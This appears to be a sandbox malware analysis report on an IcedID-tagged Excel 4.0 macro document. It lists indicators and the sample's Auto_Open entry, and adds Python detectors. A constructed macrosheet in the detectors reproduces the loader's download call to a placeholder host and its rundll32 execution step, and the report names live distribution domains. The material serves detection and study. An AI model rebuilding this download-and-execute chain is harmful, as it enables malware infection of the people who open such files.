
Analysis Report statistic-2067311372.xlsm

Overview

General Information

Sample Name: statistic-2067311372.xlsm
Analysis ID: 403886
MD5: 894169c41e45975fa36c36c031628f52
SHA1: 3ad2f1b52fca973252dfba03610bf1def0c37e3c
SHA256: 69a97d83771cb6cb1583fbf95e5fb9ada26f1ee6257351ecf24b9b4e9e4d80d4
Tags: IcedID, xlsm

Detection: Hidden Macro 4.0
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2108 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2708 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2636 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: sharedStrings.xml | Rule: JoeSecurity_MalDoc_1 | Description: Yara detected MalDoc_1 | Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2108, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 2708
Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community | Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2108, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 2708
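The two Sigma hits above reduced to plain Python, as an added example that is not Joe Sandbox or Sigma project code. It runs over constructed process-creation events, the first of which mirrors the report's own record (EXCEL.EXE PID 2108 spawning rundll32 PID 2708 with `rundll32 ..\jordji.nbvt1,DllRegisterServer`); field names follow the Sysmon/Sigma process_creation convention (Image, ParentImage, CommandLine), and the event source, the benign and out-of-place events, and the tag names are assumptions. Besides the two rules it also pulls out what makes this particular rundll32 line suspicious on its own: a relative DLL path, a non-.dll extension, and DllRegisterServer invoked through rundll32.

```python
"""Plain-Python version of the two Sigma hits above (Office product spawning a
Windows shell; system binary executing from an unexpected location), plus the
rundll32-specific indicators visible in this report's command line.

Added example, not Joe Sandbox or Sigma project code. EVENTS is constructed to
mirror the process-creation records in the report; field names follow the
Sysmon/Sigma process_creation convention and the event source is an assumption.
"""
import ntpath

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe", "visio.exe"}
# Shells and LOLBins an Office process has no business launching.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
                "msiexec.exe", "bitsadmin.exe"}
# Binaries that should only ever run from the Windows system directories.
SYSTEM_BINARIES = {"rundll32.exe", "regsvr32.exe", "svchost.exe", "lsass.exe",
                   "services.exe", "csrss.exe", "winlogon.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")


def _base(path):
    return ntpath.basename(path).lower()


def office_spawns_shell(ev):
    """Sigma 'Microsoft Office Product Spawning Windows Shell'."""
    return _base(ev.get("ParentImage", "")) in OFFICE_IMAGES and _base(ev["Image"]) in SHELL_IMAGES


def system_binary_outside_system_dir(image):
    """Sigma 'System File Execution Location Anomaly', reduced to a path-prefix check."""
    return _base(image) in SYSTEM_BINARIES and not image.lower().startswith(SYSTEM_DIRS)


def rundll32_indicators(cmdline):
    """Reasons a rundll32 command line looks like a macro-dropped loader being run.

    The report's line is `rundll32 ..\\jordji.nbvt1,DllRegisterServer`: a relative
    path, a made-up extension, and DllRegisterServer (regsvr32 semantics) called
    through rundll32 so the DLL's registration routine runs the payload.
    """
    parts = cmdline.strip().split(None, 1)
    if len(parts) < 2 or _base(parts[0].strip('"')) not in ("rundll32", "rundll32.exe"):
        return []
    target, _, export = parts[1].strip().partition(",")
    target = target.strip('"')
    reasons = []
    if not ntpath.isabs(target):
        reasons.append("relative-dll-path")
    if ntpath.splitext(target)[1].lower() not in (".dll", ".cpl"):
        reasons.append("non-dll-extension")
    if export.strip().lower() == "dllregisterserver":
        reasons.append("dllregisterserver-export")
    return reasons


def triage(events):
    """Map ProcessId -> list of tags for every event that trips at least one check."""
    hits = {}
    for ev in events:
        tags = []
        if office_spawns_shell(ev):
            tags.append("office-spawns-shell")
        if _base(ev["Image"]) == "rundll32.exe":
            tags.extend(rundll32_indicators(ev["CommandLine"]))
        if system_binary_outside_system_dir(ev["Image"]):
            tags.append("system-binary-outside-system-dir")
        if tags:
            hits[ev["ProcessId"]] = tags
    return hits


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
# Constructed events: the first mirrors the report (PID 2708 under EXCEL.EXE PID 2108),
# the rest are assumed benign / anomalous cases to show what does and does not fire.
EVENTS = [
    {"ProcessId": 2708, "ParentProcessId": 2108, "ParentImage": EXCEL,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\jordji.nbvt1,DllRegisterServer"},
    {"ProcessId": 1100, "ParentProcessId": 900, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ProcessId": 3300, "ParentProcessId": 3100,
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
    {"ProcessId": 4400, "ParentProcessId": 900, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\user\AppData\Local\Temp\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\user\AppData\Local\Temp\x.dll,Start"},
    {"ProcessId": 5500, "ParentProcessId": 2108, "ParentImage": EXCEL,
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe"},
]

if __name__ == "__main__":
    for pid, tags in triage(EVENTS).items():
        print(pid, ", ".join(tags))
```

Only the report's event collects all four tags; the explorer-launched Control Panel applet and the printer helper spawned by Excel stay silent, which is the point of keeping the Office check to shells and LOLBins rather than to any child process.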

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: statistic-2067311372.xlsm | Metadefender: Detection: 18%
Source: statistic-2067311372.xlsm | ReversingLabs: Detection: 55%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: industrialarttextile.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 192.254.233.89:443

Networking:

Yara detected MalDoc1
Source: Yara match | File source: sharedStrings.xml, type: SAMPLE
Source: Joe Sandbox View | IP Address: 192.185.5.2
Source: Joe Sandbox View | IP Address: 192.254.233.89
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48501294.png
Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: industrialarttextile.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: jordji.nbvt11.0.dr | String found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | HTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 4 | Screenshot OCR: Enable Content from the yellow bar above P,,mM1 i 92 j| , RunDLL |~| WHY I CANNOTOPEN THIS DO ,0
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing , please click Enable Content i from the yellow bar above WHY I CANNOTOPEN THIS DOC
Source: Screenshot number: 8 | Screenshot OCR: Enable Content i from the yellow bar above WHY I CANNOTOPEN THIS DOCUMENT? 1 W You are usingiOS o
Source: Document image extraction number: 7 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 7 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 17 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 17 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
Source: statistic-2067311372.xlsm | Initial sample: EXEC
Source: statistic-2067311372.xlsm | Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: statistic-2067311372.xlsm | Initial sample: Sheet size: 22188
Source: workbook.xml | Binary string:
  <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
    <fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/>
    <workbookPr filterPrivacy="1"/>
    <bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews>
    <sheets>
      <sheet name="Sheet1" sheetId="9" r:id="rId1"/>
      <sheet name="Sheet2" sheetId="4" r:id="rId2"/>
      <sheet name="Sheet3" sheetId="7" r:id="rId3"/>
      <sheet name="Sheet4" sheetId="8" r:id="rId4"/>
    </sheets>
    <definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames>
    <calcPr calcId="145621"/>
    <extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst>
  </workbook>
Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal84.troj.expl.evad.winXLSM@5/18@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$statistic-2067311372.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD5C5.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
Source: statistic-2067311372.xlsm | Metadefender: Detection: 18%
Source: statistic-2067311372.xlsm | ReversingLabs: Detection: 55%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: statistic-2067311372.xlsm | Initial sample: OLE zip file path = xl/media/image4.png
Source: statistic-2067311372.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: statistic-2067311372.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
Source: statistic-2067311372.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: statistic-2067311372.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: statistic-2067311372.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (26 times)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (2 times)
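A static triage pass for the Excel 4.0 macro evidence above (the `_xlnm.Auto_Open` defined name pointing at Sheet2!$AO$115, a hidden macrosheet, and EXEC/CALL formulas), written as an added example that is not Joe Sandbox code and does not operate on the sample itself. It assembles a minimal .xlsm package in memory: WORKBOOK_XML is the report's own xl/workbook.xml (extLst trimmed, and `state="veryHidden"` added on Sheet2 so the hidden-sheet check has something to find; the report's copy carries no state attribute), while the relationships part and the macrosheet are constructed, with the EXEC line taken from the report's rundll32 command and a placeholder download URL in the CALL. It then reads the package the way Excel does, through the workbook's relationships, rather than guessing part names.

```python
"""Static triage of an .xlsm for XLM (Excel 4.0) macro evidence: Auto_Open
entry point, macrosheets and their hidden state, and EXEC/CALL-style formulas.

Added example, not Joe Sandbox code and not the sample itself. WORKBOOK_XML is
the report's workbook.xml (extLst trimmed, state="veryHidden" added on Sheet2);
the .rels and macrosheet parts, the placeholder URL and the cell layout are
constructed for the demonstration.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
MACROSHEET_TYPE = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
# XLM functions worth flagging on sight.
SUSPICIOUS = re.compile(r"\b(EXEC|CALL|REGISTER|FORMULA|RUN|SHELL)\s*\(", re.I)

WORKBOOK_XML = (
    '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/>'
    '<workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" '
    'windowWidth="4020" windowHeight="3120"/></bookViews><sheets>'
    '<sheet name="Sheet1" sheetId="9" r:id="rId1"/>'
    '<sheet name="Sheet2" sheetId="4" state="veryHidden" r:id="rId2"/>'
    '<sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/>'
    '</sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName>'
    '</definedNames><calcPr calcId="145621"/></workbook>'
)
RELS_XML = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="%s/worksheet" Target="worksheets/sheet1.xml"/>'
    '<Relationship Id="rId2" Type="%s" Target="macrosheets/sheet1.xml"/>'
    '<Relationship Id="rId3" Type="%s/worksheet" Target="worksheets/sheet2.xml"/>'
    '<Relationship Id="rId4" Type="%s/worksheet" Target="worksheets/sheet3.xml"/>'
    '</Relationships>'
) % (NS_REL, MACROSHEET_TYPE, NS_REL, NS_REL)
MACROSHEET_XML = (
    '<xm:macrosheet xmlns="%s" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
    '<sheetData><row r="115"><c r="AO115"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
    '"https://example.invalid/1.png","..\\jordji.nbvt1",0,0)</f></c></row>'
    '<row r="116"><c r="AO116"><f>EXEC("rundll32 ..\\jordji.nbvt1,DllRegisterServer")</f></c></row>'
    '<row r="117"><c r="AO117"><f>HALT()</f></c></row></sheetData></xm:macrosheet>'
) % NS_MAIN


def build_sample():
    """Assemble the constructed .xlsm package in memory and return its bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", WORKBOOK_XML)
        zf.writestr("xl/_rels/workbook.xml.rels", RELS_XML)
        zf.writestr("xl/macrosheets/sheet1.xml", MACROSHEET_XML)
        for n in (1, 2, 3):
            zf.writestr("xl/worksheets/sheet%d.xml" % n, '<worksheet xmlns="%s"/>' % NS_MAIN)
    return buf.getvalue()


def triage_xlsm(data):
    """Return Auto_Open targets, macrosheet names, hidden macrosheets and flagged formulas."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    wb = ET.fromstring(zf.read("xl/workbook.xml"))
    rels = {r.get("Id"): r for r in ET.fromstring(zf.read("xl/_rels/workbook.xml.rels"))}
    sheets = []
    for s in wb.iter("{%s}sheet" % NS_MAIN):
        rel = rels.get(s.get("{%s}id" % NS_REL))   # r:id links the sheet to its part
        sheets.append({
            "name": s.get("name"),
            "state": s.get("state", "visible"),    # hidden / veryHidden is the usual tell
            "target": rel.get("Target") if rel is not None else None,
            "macro": rel is not None and rel.get("Type") == MACROSHEET_TYPE,
        })
    auto_open = [d.text for d in wb.iter("{%s}definedName" % NS_MAIN)
                 if (d.get("name") or "").lower() in ("_xlnm.auto_open", "auto_open")]
    formulas = []
    for sh in sheets:
        if not sh["macro"]:
            continue
        root = ET.fromstring(zf.read("xl/" + sh["target"]))
        for c in root.iter("{%s}c" % NS_MAIN):
            f = c.find("{%s}f" % NS_MAIN)
            if f is not None and f.text and SUSPICIOUS.search(f.text):
                formulas.append((sh["name"], c.get("r"), f.text))
    return {
        "auto_open": auto_open,
        "macrosheets": [s["name"] for s in sheets if s["macro"]],
        "hidden_macrosheets": [s["name"] for s in sheets if s["macro"] and s["state"] != "visible"],
        "suspicious_formulas": formulas,
        # Auto-run entry point plus EXEC/CALL in a macrosheet is the combination the report flags.
        "verdict": bool(auto_open and formulas),
    }


if __name__ == "__main__":
    for key, value in triage_xlsm(build_sample()).items():
        print(key, value)
```

Resolving sheets through workbook.xml.rels matters because a macrosheet part can be named anything; the relationship Type, not the path, is what identifies it. For a real sample, pass the file's bytes to triage_xlsm() instead of build_sample().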

Mitre Att&ck Matrix

Techniques per tactic as listed in the report's matrix; a technique followed by a digit is one the report's signatures matched, the digit being its superscript count.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Scripting 21, Exploitation for Client Execution 23, At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection 1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading 1, Disable or Modify Tools 1, Rundll32 1, Process Injection 1, Scripting 21
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: File and Directory Discovery 1, System Information Discovery 2, Query Registry, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Encrypted Channel 2, Non-Application Layer Protocol 1, Application Layer Protocol 2, Ingress Tool Transfer 1, Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

Behavior Graph

Legend of the graph (the graph image itself is not reproduced here): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: statistic-2067311372.xlsm | Detection: 6% | Scanner: Virustotal
Source: statistic-2067311372.xlsm | Detection: 21% | Scanner: Metadefender
Source: statistic-2067311372.xlsm | Detection: 55% | Scanner: ReversingLabs | Label: Win32.Trojan.Ditertag

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source: anaheimdermatologists.com | Detection: 3% | Scanner: Virustotal
Source: industrialarttextile.com | Detection: 0% | Scanner: Virustotal

URLs

Source: http://www.icra.org/vocabulary/. | Detection: 0% | Scanner: URL Reputation | Label: safe
Source: http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Detection: 0% | Scanner: URL Reputation | Label: safe

Domains and IPs

Contacted Domains

Name: anaheimdermatologists.com | IP: 192.185.5.2 | Active: true | Malicious: false | Reputation: unknown
Name: industrialarttextile.com | IP: 192.254.233.89 | Active: true | Malicious: false | Reputation: unknown

URLs from Memory and Binaries

Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp
  Malicious: false | Reputation: high
Name: http://www.windows.com/pctv.
  Source: rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp
  Malicious: false | Reputation: high
Name: http://investor.msn.com
  Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp
  Malicious: false | Reputation: high
Name: http://www.msnbc.com/news/ticker.txt
  Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp
  Malicious: false | Reputation: high
Name: http://www.icra.org/vocabulary/.
  Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
Name: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
Name: http://www.hotmail.com/oe
  Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp
  Malicious: false | Reputation: high
Name: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
  Source: jordji.nbvt11.0.dr
  Malicious: false | Reputation: high
Name: http://investor.msn.com/
  Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmp
  Malicious: false | Reputation: high

Contacted IPs

Public

IP: 192.185.5.2 | Domain: anaheimdermatologists.com | Country: United States | ASN: 46606 | ASN Name: UNIFIEDLAYER-AS-1, US | Malicious: false
IP: 192.254.233.89 | Domain: industrialarttextile.com | Country: United States | ASN: 46606 | ASN Name: UNIFIEDLAYER-AS-1, US | Malicious: false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403886
Start date: 04.05.2021
Start time: 13:48:41
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 15s
Hypervisor based Inspection enabled: false
Report type: light
